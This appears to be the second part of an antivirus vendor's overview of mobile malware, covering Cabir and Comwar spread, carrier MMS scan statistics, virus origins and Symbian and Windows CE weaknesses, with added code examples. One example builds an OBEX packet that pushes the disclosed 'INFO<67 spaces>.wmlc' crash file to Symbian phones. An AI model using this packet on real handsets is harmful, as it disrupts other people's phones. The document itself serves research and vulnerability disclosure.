Mobile Malware Evolution: An Overview, Part 2

Contents
  1. Mobile Malware Evolution: An Overview, Part 1
  2. Mobile Malware Evolution: An Overview, Part 2

Epidemics

Let’s take a look at how widespread mobile malware really is in the modern world. Users and journalists often complain that antivirus companies artificially inflate the danger of viruses, spreading hysteria. It’s said that Cabir’s chances of spreading are very low due to the fact that in order for the virus to be launched, the user has to confirm the action three times (in order to accept the file, launch the file, and install the worm). And Comwar couldn’t spread widely, because MMS isn’t in common use (the figure quoted is approximately 2% of mobile users overall). As for the danger of being infected by a vandal Trojan, for instance Skuller, most people don’t even want to hear about this; after all, in order for such a virus to infect your handset, you would have to download it from the Internet, copy it to the telephone, and then launch it.

Certainly from a theoretical point of view, these conclusions are logical, and reasonably convincing. However, the world of computer and mobile malware, just like those who use computers and mobile devices, constantly defies the laws of logic. The likelihood of a user receiving and launching Cabir is equal to the likelihood of a user accepting and launching a file sent via email from an unknown sender. And yes, the file will be launched. The global worm epidemics of the past few years – Mydoom, NetSky, Sober – are evidence of this. Antivirus companies never tire of repeating ‘Don’t launch a file sent to you by mail without scanning it first’. But this doesn’t seem to have had much effect – human curiosity, and a disregard for basic security always win out.

Cabir

Cabir was sent to antivirus companies in June 2004. Only a month later it became clear that cases of infection by Cabir had already been detected in the Philippines. This was surprising. At the time, we considered that Cabir was a ‘zoo’ virus which would never be found beyond the confines of the collections of antivirus companies. However, it turned out that it wasn’t only antivirus companies which had received Cabir, but virus writers as well. The virus broke free, and set off on its travels around the world.

We’ve been working with the Finnish company F-Secure for a long time. F-Secure was one of the first to draw attention to the problems of mobile malware, and the company has been conducting a considerable amount of research in this area. It started compiling a list of countries where Cabir had been detected. In less than a year, by summer 2005, this list included more than 20 countries. We were also collecting similar statistics, and this list contains some data from us as well. In addition to this, we’ve received confirmation of cases of infection from a number of countries which are already in the list. The list can therefore be seen as reflecting reality, and as a reliable source of information.

Approximately a year ago we started to lose count, and stopped updating the list. It was clear that there were already more than two dozen countries involved. Interestingly, the countries which suffered from Cabir were not necessarily those with the highest level of computer use.

1. Philippines
2. Singapore
3. UAE
4. China
5. India
6. Finland
7. Vietnam
8. Turkey
9. Russia
10. UK
11. Italy
12. USA
13. Japan
14. Hong Kong
15. France
16. South Africa
17. The Netherlands
18. Egypt
19. Luxembourg
20. Greece
21. Ukraine
22. New Zealand
23. Switzerland
24. Germany

Countries where Cabir was detected
(September 2005, combined data from F-Secure and Kaspersky Lab)

Below are a few concrete cases of infection by Cabir. Russia is 9th in the list of countries affected. The fact that Cabir was in the wild in Russia first became clear in January 2005. By then we had already received information that Cabir was attacking telephones in the Moscow metro. We'd also received similar information from neighbouring Ukraine, with Cabir surfacing in Kiev and Kharkiv. However, we weren't able to confirm those cases, as no-one had contacted us with an infected telephone.

In January 2005 this changed: an employee working in the same building as Kaspersky Lab contacted our technical support, saying that a few days earlier her handset had started to behave oddly, after she had accepted a file transmitted via Bluetooth in the metro. After examining her phone, our virus analysts confirmed that it was infected with Cabir.a.

We continued to encounter infected telephones throughout 2005; we also had reports from approximately 10 Kaspersky Lab employees that they had been asked whether or not they wanted to accept a file named caribe.sis, transmitted via Bluetooth. The most recent case that we recorded took place in February 2006.

Probably the best known local epidemic caused by Cabir took place in Helsinki in August 2005, during the 10th World Championships in Athletics. F-Secure's head office is in Helsinki, and it was F-Secure that started receiving reports of Cabir infections from within the stadium where the championships were being held. Under these conditions, with tens of thousands of people from all over the world in a relatively small space, a single infected telephone could spread the infection very quickly. While sporting records were being set on the field, Cabir was breaking records in speed of propagation.

Thankfully, F-Secure personnel were able to act quickly and set up a point of contact in the Customer Service Center, where anyone who suspected that their mobile had been infected could have the handset checked and disinfected. If the epidemic hadn't been contained locally, the infected handsets would have been taken back to their owners' countries of origin, and the list of countries affected by Cabir could have been considerably longer.

This is a clear example of what conditions are necessary for a Bluetooth worm to propagate successfully:

  • a large number of people
  • a limited amount of space

Restaurants, cinemas, airports, railway stations, underground systems and sports grounds all fall into this category.

Bluetooth worms have the following peculiarities in terms of propagation:

  • the infection radius is limited to the radius of the Bluetooth connection (approximately 10 – 20 meters)
  • Bluetooth worms are unable to conduct targeted attacks, for instance in accordance with a list of potential victims or on a randomly generated phone number. Infection is spontaneous – if a vulnerable device is within range, then the worm will attempt to infect that device.
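
To make the contrast between these two propagation models concrete, here is a small Monte Carlo simulation, added as an illustration; it is not code from the original article, and every parameter in it (a 10 m radius, a 30% share of vulnerable handsets, a 20% chance that the owner accepts a transfer or opens an MMS, the crowd sizes and areas) is an assumption chosen for the demonstration. It pits a range-limited Bluetooth worm in a dense stadium stand against the same worm on a sparse street, and against an MMS worm whose reach does not depend on distance.

```python
"""Toy propagation model: a Bluetooth worm bounded by radio range versus an
MMS worm that reaches any subscriber.  Added illustration, not code from the
original article; all parameters are assumptions chosen for the simulation."""
import random


def _place_devices(n, area_m, rng):
    """Scatter n handsets uniformly over an area_m x area_m square (metres)."""
    return [(rng.uniform(0, area_m), rng.uniform(0, area_m)) for _ in range(n)]


def simulate_bluetooth_worm(n, area_m, radius_m=10.0, vulnerable_frac=0.3,
                            accept_prob=0.2, ticks=20, seed=1):
    """Return the number of infected handsets after `ticks` rounds.

    Each round every infected handset scans for devices within radius_m and
    offers the worm to each vulnerable neighbour, who accepts it with
    probability accept_prob (the owner confirming the Bluetooth transfer).
    Infection is untargeted: whoever happens to be in range gets the offer.
    """
    rng = random.Random(seed)
    pos = _place_devices(n, area_m, rng)
    vulnerable = [rng.random() < vulnerable_frac for _ in range(n)]
    infected = [False] * n
    vulnerable[0] = infected[0] = True          # patient zero walks into the crowd
    r2 = radius_m * radius_m
    for _ in range(ticks):
        newly = set()
        for i, (xi, yi) in enumerate(pos):
            if not infected[i]:
                continue
            for j, (xj, yj) in enumerate(pos):
                if infected[j] or not vulnerable[j]:
                    continue
                if (xi - xj) ** 2 + (yi - yj) ** 2 <= r2 and rng.random() < accept_prob:
                    newly.add(j)
        for j in newly:
            infected[j] = True
    return sum(infected)


def simulate_mms_worm(n, contacts_per_tick=5, vulnerable_frac=0.3,
                      open_prob=0.3, ticks=20, seed=1):
    """Same kind of population, but each infected handset sends the worm as an
    MMS to contacts_per_tick random subscribers per round, at any distance."""
    rng = random.Random(seed)
    vulnerable = [rng.random() < vulnerable_frac for _ in range(n)]
    infected = [False] * n
    vulnerable[0] = infected[0] = True
    for _ in range(ticks):
        newly = set()
        for i in range(n):
            if not infected[i]:
                continue
            for j in rng.sample(range(n), contacts_per_tick):
                if vulnerable[j] and not infected[j] and rng.random() < open_prob:
                    newly.add(j)
        for j in newly:
            infected[j] = True
    return sum(infected)


def compare_scenarios(n=400, seed=1):
    """Stadium stand (n handsets in 60 m x 60 m) versus a sparse street
    (same n over 1 km x 1 km) versus MMS, which ignores geography."""
    return {
        "bluetooth_stadium": simulate_bluetooth_worm(n, area_m=60.0, seed=seed),
        "bluetooth_street": simulate_bluetooth_worm(n, area_m=1000.0, seed=seed),
        "mms_any_distance": simulate_mms_worm(n, seed=seed),
    }


if __name__ == "__main__":
    print(compare_scenarios())
```

Running it prints the infected counts for the three scenarios: the stadium run saturates the vulnerable population within a handful of rounds, the street run barely gets past patient zero, and the MMS run spreads regardless of where the handsets are, which is the difference the text draws between the Helsinki stadium and Comwar.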

Comwar

The second worm for mobile devices detected in the wild was Comwar. In contrast to Cabir, which was initially sent to antivirus companies and only later found in the wild, Comwar was detected after users in several countries had had their devices infected and had sent suspicious files to antivirus companies for analysis. We were introduced to Comwar in March 2005; however, information about incidents in January 2005 had been posted on some mobile phone message boards (for instance in Holland and Serbia). This means we can state with certainty that Comwar had been spreading around the world for at least two months before antivirus companies knew about it. It highlights the fact that the link between users and antivirus companies is still weak where mobile malware is concerned: while PC users may suspect a virus at the least sign of anything unexpected on their computers and contact an antivirus company, this is still far from the case with mobile malware, and it will be a long time before the situation changes.

Just as with Cabir, F-Secure started keeping a list of countries where Comwar had been detected. We compared our data and the most recent list (September 2005) reads as follows:

1. Ireland
2. India
3. Oman
4. Italy
5. Philippines
6. Finland
7. Greece
8. South Africa
9. Malaysia
10. Austria
11. Brunei
12. Germany
13. USA
14. Canada
15. UK
16. Romania
17. Poland
18. Russia
19. Netherlands
20. Egypt
21. Ukraine
22. Serbia

Countries where Comwar was detected
(September 2005, combined data from F-Secure and Kaspersky Lab)

It’s interesting that both lists are of a similar length (24 countries for Cabir, 22 for Comwar). Comwar appeared 8 months after Cabir. However, it has a more dangerous propagation method (MMS messages, which can be transmitted over any distance), which made it possible for it to catch up with Cabir. It seems highly likely that the number of countries with Comwar infections is now greater than the number with Cabir infections.

There is one important point which should be stressed: the list includes countries where it was known that there had been at least one incident involving Comwar. This list should not be used to draw conclusions on how widespread the worm is within each individual country – preliminary estimates can only be made on the basis of other related evidence.

Thankfully, it’s not only antivirus companies which are concerned about worms which spread via MMS; mobile service providers are also doing their bit. In Russia, some providers have taken steps to protect their users by installing our antivirus solution (very similar to that used to scan email) on their networks.

This means we now have access to hard data, and as it turns out, MMS traffic doesn’t only contain mobile malware but also traditional computer worms. Mass-mailing worms send themselves to harvested email addresses, and where an operator runs an email-to-MMS gateway some of those addresses are also MMS addresses, so the worm ends up in MMS traffic. However, as this article focuses on mobile malware, we won’t examine this topic here.

The data below is being published for the first time. The data comes from an analysis of the MMS traffic of one of the major Russian mobile service providers. The number of MMS messages analyzed has not been included at the request of the provider.

Name of malicious program        Number of infected MMS
Worm.SymbOS.ComWar.a             4733
Worm.SymbOS.ComWar.c             450
Trojan-SMS.J2ME.RedBrowser.b     1

Data for 11th – 17th June 2006

Name of malicious program        Number of infected MMS (change from previous period)
Worm.SymbOS.ComWar.a             5498 (+765)
Worm.SymbOS.ComWar.c             854 (+404)
Trojan-SMS.J2ME.RedBrowser.b     1 (+0)

Data for 18th – 24th June 2006

Name of malicious program        Number of infected MMS (change from previous period)
Worm.SymbOS.ComWar.a             4564 (-934)
Worm.SymbOS.ComWar.c             756 (-98)

Data for 25th June – 1st July 2006

Name of malicious program        Number of infected MMS (change from previous period)
Worm.SymbOS.ComWar.a             4837 (+273)
Worm.SymbOS.ComWar.c             698 (-58)
Worm.SymbOS.ComWar.d             6 (+6)

Data for 1st July – 7th July 2006

It’s worth highlighting the statistics for Comwar.d. This variant was created in a Spanish-speaking country, which makes it all the more surprising to see it in Russian MMS traffic. Comwar.d was first detected in March 2006 and arrived in Russia only four months later.

I’d also like to mention a case of Comwar infection that was detected by KL employees. In June 2005 Kaspersky Lab held its partner conference in Greece. Once the conference was over, some KL employees took a yachting holiday on the Aegean. One day the captain and owner of the yacht complained that his Nokia smartphone was constantly receiving notifications that MMS messages hadn’t been delivered; this was strange, as he hadn’t sent any. The beta version of KAV Mobile was downloaded from the Internet and installed, and the root of the problem was found: the phone was infected with Comwar. It’s a strange thought that the worm can spread from a yacht in the middle of the sea, as long as there’s mobile network coverage.
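
The following is an added sketch of the attachment check that a carrier-side MMS scanner of the kind described above would perform, together with the period-over-period tally used in the weekly tables. It is not Kaspersky Lab's scanner, and the sample bytes, the application UID, the file names and the signature hashes are all constructed for the demonstration. The one piece of real structure it relies on is the Symbian installer format: pre-9.x SIS files carry the UID 0x10000419 at byte offset 8, and 9.x SIS files begin with 0x10201A7A, so an installer can be recognised by its header whatever the attachment is called. Known samples are matched by hash; an unrecognised installer is still flagged, because, as the Comwar.d row shows, new variants turn up in traffic before signatures for them exist.

```python
"""Sketch of the attachment check a carrier-side MMS scanner performs.
Added example, not the scanner mentioned in the article; sample bytes,
UIDs, file names and signature hashes below are constructed for the demo."""
import hashlib
import struct
from collections import Counter

# Symbian SIS identifiers (from the public file format):
#   pre-v9 SIS: UID3 at byte offset 8 is 0x10000419
#   v9 SIS:     the first four bytes are 0x10201A7A
SIS_UID3_PRE_V9 = 0x10000419
SIS_UID1_V9 = 0x10201A7A


def is_symbian_sis(data: bytes) -> bool:
    """Identify a Symbian installer by its header UIDs, not by file extension."""
    if len(data) >= 12 and struct.unpack_from("<I", data, 8)[0] == SIS_UID3_PRE_V9:
        return True
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == SIS_UID1_V9:
        return True
    return False


def _fake_sis(app_uid: int, body: bytes) -> bytes:
    """Header-only stand-in for a pre-v9 SIS (constructed, not installable)."""
    uid2 = 0x10003A12                       # EPOC release 6 SIS marker
    header = struct.pack("<III", app_uid, uid2, SIS_UID3_PRE_V9)
    return header + b"\0\0\0\0" + body      # UID4 checksum left zero on purpose


# Constructed samples standing in for known-bad installers; the real worms'
# hashes are deliberately not reproduced here.
SAMPLE_COMWAR_A = _fake_sis(0x0F000001, b"demo-sample-A")
SAMPLE_COMWAR_C = _fake_sis(0x0F000001, b"demo-sample-C")
SIGNATURES = {
    hashlib.sha256(SAMPLE_COMWAR_A).hexdigest(): "Worm.SymbOS.ComWar.a",
    hashlib.sha256(SAMPLE_COMWAR_C).hexdigest(): "Worm.SymbOS.ComWar.c",
}


def scan_attachment(filename: str, data: bytes) -> dict:
    """Verdict for one MMS attachment.

    'detected'   = hash matches a known sample
    'suspicious' = unknown Symbian installer (possibly a new variant)
    'clean'      = anything else
    """
    digest = hashlib.sha256(data).hexdigest()
    if digest in SIGNATURES:
        return {"verdict": "detected", "name": SIGNATURES[digest], "file": filename}
    if is_symbian_sis(data):
        return {"verdict": "suspicious", "name": "unknown SIS installer", "file": filename}
    return {"verdict": "clean", "name": None, "file": filename}


def scan_period(attachments) -> Counter:
    """Count non-clean verdicts over an iterable of (filename, bytes)."""
    counts = Counter()
    for filename, data in attachments:
        result = scan_attachment(filename, data)
        if result["verdict"] != "clean":
            counts[result["name"]] += 1
    return counts


def period_report(counts: Counter, previous: Counter) -> dict:
    """{name: (count, change vs previous period)}, the layout of the tables above."""
    names = set(counts) | set(previous)
    return {n: (counts.get(n, 0), counts.get(n, 0) - previous.get(n, 0)) for n in names}


if __name__ == "__main__":
    # Constructed week of traffic: note the installer renamed to .jpg
    week = [
        ("bonus.sis", SAMPLE_COMWAR_A),
        ("photo.jpg", SAMPLE_COMWAR_A),      # extension lies; the header does not
        ("update.sis", SAMPLE_COMWAR_C),
        ("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16),
        ("new.sis", _fake_sis(0x20000001, b"unseen-variant")),
    ]
    print(period_report(scan_period(week), Counter()))
```

Hash matching is what produces the per-variant rows in the tables; the structural SIS check is what gives an analyst the first sample of the next variant.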

In addition to Cabir and Comwar, we class some variants of the Skuller, Drever, Appdisabler, Cardtrap, PbStealer, RedBrowser, Doombot, Flexispy Trojans and StealWar, a worm, as being in the wild. Many of these programs were presented as games or useful applications and published on sites aimed at Symbian users.

The birthplace of viruses

Inevitably, when the talk turns to computer viruses, the question about which country viruses come from will be raised. The Western media espouses the stereotype of the Russian threat. However, this is a myth which crumbles when examined carefully. Many virus writers whose creations caused epidemics in the past few years have been arrested; with others, it’s easy to establish which country they live in:

  • Sasser and NetSky worms (Germany)
  • Zafi worm (Hungary)
  • Bozori worm (Turkey/Morocco)
  • Agobot and Codbot backdoors (the Netherlands)
  • Slammer worm (East Asia)
  • Sober worm (Germany)

The ‘Russians’ can only claim Bagle, and even this worm is likely to have been created by an international group of cyber criminals.

Going on what we’ve seen, China currently leads this rather depressing race, with Brazil in second place. A significant number of modern viruses are created in Turkey, and the countries of the former Soviet Union are level with Turkey in terms of the number of viruses created.

Looking at mobile viruses from the same standpoint, the picture is similar. We can establish the country of origin in the vast majority of cases for the 31 families of mobile malware. As we already mentioned, Cabir was created by Vallez, a Frenchman. After the worm became available on the computer underground, modifications started to spring up all over the place. South East Asian countries (the Philippines, Indonesia, Malaysia and China) were the most active in creating new variants. However, when Velasco, a Brazilian, created Lasco, he also created several new Cabir variants.

The former Soviet Union also earned a place in the history of mobile malware by producing four viruses. Three of them were proof of concept. Brador, the first backdoor for WinCE, was created by a programmer from Ukraine who goes under the pseudonym BrokenSword. Comwar, to which we’ve devoted a lot of space in this article, was undoubtedly created in Russia; this is clear both from the texts within the worm itself and from the information we have about its creator, who goes under the name e10d0r. The author of the third PoC virus, a Trojan called RedBrowser, is unknown, but the texts within the Trojan and the phone number to which RedBrowser sends SMS messages clearly indicate the author’s Russian origins.

As for the Locknut Trojan, it was first detected by SimWorks, a New Zealand antivirus company. The conclusion that its creator is Russian was made on the basis of the ungrammatical texts within the Trojan and the file names used.

As we noted in the first part of this article, a number of Comwar variants contain texts in Spanish. This is the basis for concluding that they were created in Spain, although we have no data about Comwar infections in Spain, which would otherwise be an indirect indicator of the virus’ origin.

Turkey is responsible for some modifications of Skuller and Cardtrap, and for Arifat, a family of Trojans of which we have so far seen only one sample.

Without doubt, however, the vast majority of mobile viruses were created in China, and, possibly, South Korea. We came to this rather peculiar conclusion as we are dealing with a very peculiar situation. The problem is that over the past year, the vast majority of Trojans for mobile devices were initially detected and sent to antivirus companies from South Korea. However, an investigation into a number of cases showed that the Trojans were placed on Korean servers which had been hacked, and the hacking had been done from Chinese territory. Viruses such as PbStealer, StealWar and some variants of almost every similar Trojan family were also created in China.

One virus writer in Malaysia is also worthy of mention: s/he is responsible for the vast majority of Skuller variants, including, perhaps, the first one.

What do all these facts show? That the world of mobile malware is evolving in accordance with the same laws as the world of computer viruses. And that both mobile malware and computer viruses are created in the same countries.

The problem of operating systems

The factor which has most influence on the evolution of mobile malware is vulnerabilities in software and mobile device operating systems themselves. In the computing world, nearly all the major virus epidemics over the past few years have been caused by vulnerabilities in Windows. There are only two possible ways for remote malicious users to penetrate a potential victim system: by exploiting the human factor (social engineering) or by exploiting software coding errors (vulnerabilities). These attack vectors also apply to mobile devices.

Let’s take a look at three main vulnerability sources:

  • Windows CE (operating system)
  • Symbian (operating system)
  • Wireless protocols (Bluetooth, WiFi, infra-red ports)

Windows CE is extremely vulnerable from the point of view of system security. There are no restrictions on executable applications and their processes. Once launched, a program can gain full access to any operating system function, such as receiving and transmitting files, telephony and multimedia functions, and so on. Creating applications for Windows CE is extremely easy, as the system is totally open to programming: not only native code (e.g. ARM assembler) but also powerful development technologies such as .NET can be used.

Although we currently know of only four virus families targeting Windows CE, the potential of this operating system as an environment for malicious code shouldn’t be underestimated. The viruses currently in existence represent all the most dangerous types of malicious program: classic file viruses, email worms, backdoors, and worms which are capable of moving from a handset to a desktop PC once connected to it. Platforms based on Windows CE are growing in popularity, and in a few years they may come to take the market share of mobile device operating systems, squeezing out Symbian.

Both virus writers and security researchers have become increasingly interested in Windows CE. We’ve already mentioned that Collin Mulliner gave a presentation at DefCon in August this year about a vulnerability in MMS processing in Windows CE 4.2x. Microsoft and its partners are currently working on fixing this error. Even once a fix is issued, though, users of vulnerable devices will have to be informed about the necessity of re-installing firmware on their smartphones/ PDAs.

We also shouldn’t forget that this is just one of the serious vulnerabilities detected in Windows CE over the past few months. It would be possible to mount a DoS attack on mobile devices via vulnerabilities in ActiveSync and in MMS/SMS handling. Potential vulnerabilities in Internet Explorer for Windows CE and in file-format conversion programs pose another threat. There’s no doubt that these vulnerabilities exist; the question is only who will find them first: a virus writer, or a white-hat security researcher such as Collin Mulliner or Tim Hurman (who found the Bluetooth stack remote code execution vulnerability, information about which remains confidential to this day).

Duts, the first virus for Windows CE, exploited a vulnerability in the file API which was unknown to Microsoft (a so-called 0-day vulnerability).

To summarize: Windows CE is becoming more and more popular every day. The increase in the number of malicious programs for this platform may soon become equal to the increase in malware for Symbian. The main environment used to develop malicious programs will be .NET, and a significant number of these viruses will exploit vulnerabilities in Windows CE.

Currently, the most popular embedded OS is Symbian. Here the known vulnerabilities are not as dangerous as those in Windows CE, but this security is an illusion. The very architecture of Symbian Series 60 contains a range of serious errors which we regard as real vulnerabilities. We’ve already mentioned that Symbian allows any system application to be overwritten without explicit user consent; additionally, malformed or non-standard file formats can make the system extremely unstable and cause the handset to reboot. The level of application security is very similar to that of Windows CE, in other words it doesn’t exist: once an application is in the system, it has total control over all functions. Thankfully, no vulnerability has yet been found in the parsing of Bluetooth connections and MMS on this platform. We can easily imagine what would have happened if Cabir or Comwar had been able to penetrate the system and launch themselves automatically.

Symbian is a more closed system than Windows CE. A special range of development tools costing tens of thousands of dollars is needed to create fully functional applications for Symbian. However, the number of Trojan programs for Symbian shows that vulnerabilities in the operating system’s architecture make it possible for virus writers simply to use tools which are available to anyone.

It’s a paradoxical situation: Symbian is more popular than Windows CE, but there are fewer known serious vulnerabilities for this operating system. We think there can only be one explanation – researchers, at the moment, aren’t as focussed on Symbian as they are on Microsoft products. However, even a cursory glance and a few simple experiments reveal that Symbian is riddled with errors. As an example, here’s a description of one which could be seen as still being unknown. We received information about it from one of our users, checked it, and reproduced it in our test lab.

Phones running Symbian OS 6.x (Series 60) are vulnerable. Testing was conducted on the Siemens SX1 and the Nokia 3650.

In order to exploit this vulnerability, you simply need to create a file called “INFO.wmlc”, with 67 spaces between the INFO and the dot. The contents of the file can be anything larger than 2 bytes. If this file is sent to another device via Bluetooth or the infrared port (this file could also be sent as an MMS, or placed on a web site and opened when the site was visited, but this was not tested) then the recipient, on opening the message, will see an error message which reads “App. closed AppArcServerThread USER 8”. The phone will then start to work much more slowly, and some applications may cease to function after the phone is rebooted.

This is a classic denial of service vulnerability. The ‘wmlc’ extension is associated with the standard browser, and when a non-standard file name is processed, an error occurs in the component responsible for launching the browser (AppArc, the application architecture server named in the panic message). We have not conducted a detailed analysis of the vulnerability, but it may also allow arbitrary code execution.

The information above is official notification to Symbian of the existence of the vulnerability.
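
As an added illustration (not part of the original report), the following builds the raw OBEX PUT request with which the test file would be pushed over Bluetooth Object Push to a lab handset, and parses it back to check that the name survives intact. It does not open a Bluetooth socket. The OBEX header layout (opcode 0x82 for a final PUT, Name header 0x01 as null-terminated UTF-16BE, Length header 0xC3, End-of-Body header 0x49, a 3-byte length prefix on every packet and text header) is taken from the OBEX specification; the 67-space name and the 3-byte body are the values reported above.

```python
"""Raw OBEX PUT builder/parser for delivering the 'INFO<67 spaces>.wmlc'
test file over Bluetooth Object Push.  Added example, not from the original
article.  Produces the on-the-wire request; does not touch any radio."""
import struct

OBEX_PUT_FINAL = 0x82        # PUT opcode with the final bit set
HDR_NAME = 0x01              # Unicode (UTF-16BE), null-terminated, 2-byte length
HDR_LENGTH = 0xC3            # 4-byte object length
HDR_END_OF_BODY = 0x49       # byte sequence, last chunk, 2-byte length
REPORTED_SPACES = 67         # the space count the report gives as crashing


def crash_filename(spaces: int = REPORTED_SPACES) -> str:
    """'INFO' + spaces + '.wmlc'; vary `spaces` to bisect the boundary on a test handset."""
    if spaces < 0:
        raise ValueError("space count must be non-negative")
    return "INFO" + " " * spaces + ".wmlc"


def build_obex_put(name: str, body: bytes) -> bytes:
    """Single-packet OBEX PUT carrying `body` as object `name`."""
    if len(body) <= 2:
        raise ValueError("report says the file must be larger than 2 bytes")
    name_bytes = name.encode("utf-16-be") + b"\x00\x00"
    headers = (
        struct.pack(">BH", HDR_NAME, 3 + len(name_bytes)) + name_bytes
        + struct.pack(">BI", HDR_LENGTH, len(body))
        + struct.pack(">BH", HDR_END_OF_BODY, 3 + len(body)) + body
    )
    return struct.pack(">BH", OBEX_PUT_FINAL, 3 + len(headers)) + headers


def parse_obex_put(packet: bytes) -> dict:
    """Decode opcode, name, length and body; raise ValueError on malformed input."""
    opcode, total = struct.unpack_from(">BH", packet, 0)
    if total != len(packet):
        raise ValueError("length field does not match packet size")
    pos = 3
    out = {"opcode": opcode, "name": None, "length": None, "body": b""}
    while pos < total:
        hid = packet[pos]
        kind = hid & 0xC0                      # top two bits select the encoding
        if kind in (0x00, 0x40):               # text / byte sequence: 2-byte length
            hlen = struct.unpack_from(">H", packet, pos + 1)[0]
            if hlen < 3 or pos + hlen > total:
                raise ValueError("bad header length")
            payload = packet[pos + 3:pos + hlen]
            if hid == HDR_NAME:
                out["name"] = payload[:-2].decode("utf-16-be")
            elif hid == HDR_END_OF_BODY:
                out["body"] += payload
            pos += hlen
        elif kind == 0x80:                     # single-byte value
            pos += 2
        else:                                  # 0xC0: four-byte value
            if hid == HDR_LENGTH:
                out["length"] = struct.unpack_from(">I", packet, pos + 1)[0]
            pos += 5
    return out


def make_testcase(spaces: int = REPORTED_SPACES, size: int = 3) -> bytes:
    """The PUT packet for the reported file: 67 spaces, 3 bytes of content."""
    return build_obex_put(crash_filename(spaces), b"A" * size)


if __name__ == "__main__":
    pkt = make_testcase()
    print(len(pkt), "bytes;", repr(parse_obex_put(pkt)["name"]))
```

In a real Object Push session a CONNECT request precedes the PUT; only the PUT carries the object name that triggers the AppArc panic. Use it only against a handset you own in a test lab.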

Symbian, the manufacturers of smartphones which use the OS, and developers have already taken notice of the viruses for this operating system and are taking all possible steps to ensure that the next version of Symbian has maximum protection against any type of malicious code. It was recently announced that they are implementing a protected-application architecture, similar to the Trusted Computing technology implemented in some PC processors. It is also planned to create a ‘protected memory area’ to which only trusted applications will have access. In principle, this approach may solve the problem of primitive vandal programs such as Skuller, but it will not solve the issue of vulnerabilities in the operating system and its applications. Additionally, we should not forget one of the laws of viruses: “A virus can do everything that a user can do within a system”. That means that worms which send themselves via Bluetooth and MMS will remain a reality, at least for the foreseeable future.

This article doesn’t address the issue of vulnerabilities in Bluetooth and WiFi in any detail. Anyone interested in such issues can get information from groups such as Trifinite and Pentest. We have also previously published information in this area. The only thing we’ll mention here is that although there are a number of vulnerabilities in the wireless protocols for mobile devices, virus writers have not yet started to exploit them. However, we have no doubt that they will be exploited in the very near future.
